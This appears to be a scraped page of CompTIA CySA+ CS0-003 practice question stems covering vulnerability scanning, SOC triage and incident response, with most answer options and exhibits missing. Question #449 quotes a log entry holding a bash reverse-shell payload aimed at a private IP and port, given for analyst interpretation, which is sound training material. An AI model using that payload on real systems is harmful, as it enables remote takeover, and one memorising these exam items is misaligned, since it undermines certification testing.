Free Certification Practice Questions

COMPTIA-CYSA

CompTIA's CS0-003 An analyst finds that duplicate entries may exist in the asset inventory, which is skewing vulnerability scan data. Which of the following is the best way for the analyst to improve the effectiveness of the vulnerability scan?
#421
CompTIA's CS0-003 A user is flagged for consistently consuming a high volume of network bandwidth over the past week. During the investigation, the security analyst finds traffic to the following websites: Which of the following data flows should the analyst investigate first? E. translate.google.com F. office.com
#422
CompTIA's CS0-003 After a series of UEBA alerts, a company’s SOC observes an extended period of suspicious outbound traffic all with the same destination. Which of the following steps of the cyber kill chain has this attack completed?
#423
CompTIA's CS0-003 A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Choose two.) E. IoCs F. npm identifier
#424
CompTIA's CS0-003 Security analysts can review the Windows Registry on endpoints to get insights into:
#425
CompTIA's CS0-003 An analyst notices that logs contain multiple events for computer account changes during monthly patch maintenance windows, resulting in a flood of tickets. The events generated are from the same system and time frame. The analyst determines that these tickets could be closed without human interaction. Which of the following is the best tool for automatically closing tickets containing the same information?
#426
CompTIA's CS0-003 A security administrator is tasked with modifying the vulnerability scan process to reduce the network traffic but maintain thorough checks. Which of the following scanning approaches should be implemented?
#427
CompTIA's CS0-003 A red team engineer discovers that analyzing multiple pieces of less sensitive public information results in knowledge of a sensitive piece of confidential information. Which of the following best describes this security issue?
#428
CompTIA's CS0-003 A group of hacktivists has breached and exfiltrated data from several of a bank's competitors. Given the following network log output: Which of the following represents the greatest concerns with regard to potential data exfiltration? (Choose two.) E. 5 F. 6 G. 7
#429
CompTIA's CS0-003 The SOC team reestablishes user access after a threat actor successfully performed a business account compromise in which the attacker revoked the legitimate user's access. The following logs are provided to a SOC analyst: Which of the following did the threat actor most likely use during the compromise?
#430
CompTIA's CS0-003 The security team reviews a web server for XSS and runs the following Nmap scan: Which of the following most accurately describes the result of the scan?
#431
CompTIA's CS0-003 Which of the following is the best authentication method to secure access to sensitive data?
#432
CompTIA's CS0-003 An organization adds an MSSP to supplement its security monitoring operations during weekends and holidays. Which of the following would best demonstrate procurement value to the Chief Information Security Officer?
#433
CompTIA's CS0-003 The most recent vulnerability scan results show the following: The vulnerability team learned the following from the asset owners: • Server HQFIN01 is a financial transaction database server used in the company's largest business unit. • Server HQADMIN02 is utilized by an end user with administrator privileges to several critical applications. • No compensating controls exist for either issue. Which of the following would the vulnerability team most likely do to determine remediation prioritization?
#434
CompTIA's CS0-003 A company's policy is to follow NIST standards and use strong encryption to avoid disclosure of sensitive information in transit between any systems. An analyst reviews a lab web server and receives the following outputs: Which of the following should the analyst identify as the most concerning? E. TLS compression is disabled.
#435
CompTIA's CS0-003 The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the following should be recommended as a starting point?
#436
CompTIA's CS0-003 A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report?
#437
CompTIA's CS0-003 After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the following did the change management team fail to do?
#438
CompTIA's CS0-003 Which of the following does a security policy do?
#439
CompTIA's CS0-003 A vulnerability scan shows the following vulnerabilities in the environment: At the same time, the following security advisory was released: "A zero-day vulnerability with a CVSS score of 10 may be affecting your web server. The vendor is working on a patch or workaround." Which of the following actions should the security analyst take first?
#440
CompTIA's CS0-003 Which of the following threat-hunting concepts is most concerned with identifying the behaviors of the bad actor?
#441
CompTIA's CS0-003 Which of the following best explains the importance of playbooks for incident response teams?
#442
CompTIA's CS0-003 Alerts from the security dashboard are reporting a cloud-based host is suspected to be corrupt. The OS is not loading. The initial investigation concludes that the OS files were modified. Which of the following security controls provided the report?
#443
CompTIA's CS0-003 A company received a shipment of new network switches. Immediately after installing the switches, a security analyst notices suspicious traffic coming from one of the new switches. Which of the following best describes the threat actor?
#444
CompTIA's CS0-003 Which of the following best describes the benefit of implementing a PAM solution?
#445
CompTIA's CS0-003 Several users received a phishing email containing a malicious file that bypassed the organization’s email security tool. Based on the SIEM logs, users did not open the file within the environment. In which of the following phases of the MITRE ATT&CK framework was the attack stopped?
#446
CompTIA's CS0-003 During the triage of a SIEM alarm, a security analyst identifies the following activity on a .bash_history file: Which of the following actions should the analyst take?
#447
CompTIA's CS0-003 Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective actions?
#448
CompTIA's CS0-003 A security analyst identifies the following log entry in the web server logs: 10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+-i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 - Which of the following best explains the log entry?
#449
CompTIA's CS0-003 A security analyst receives an alert with the following packet capture: Which of the following conclusions should the analyst reach about this incident?
#450